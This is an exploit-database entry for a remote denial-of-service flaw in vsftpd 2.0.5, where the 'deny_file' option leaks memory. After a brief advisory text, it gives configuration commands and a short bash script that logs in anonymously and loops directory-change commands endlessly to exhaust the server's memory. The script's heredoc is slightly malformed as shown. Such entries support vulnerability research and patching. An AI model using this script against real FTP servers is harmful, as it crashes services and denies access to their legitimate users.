Lucene search

K
exploitdbMartin NagyEDB-ID:31818
HistoryMay 21, 2008 - 12:00 a.m.

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)

2008-05-2100:00:00
Martin Nagy
www.exploit-db.com
61

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/29322/info


The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. 

# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
# service vsftpd restart

$ cat > memtest.sh <<EOF
 EOF
#!/bin/bash
echo USER anonymous
echo PASS [email protected]

while [ 1 ]; do
        echo CWD pub
        echo CWD ..
done
EOF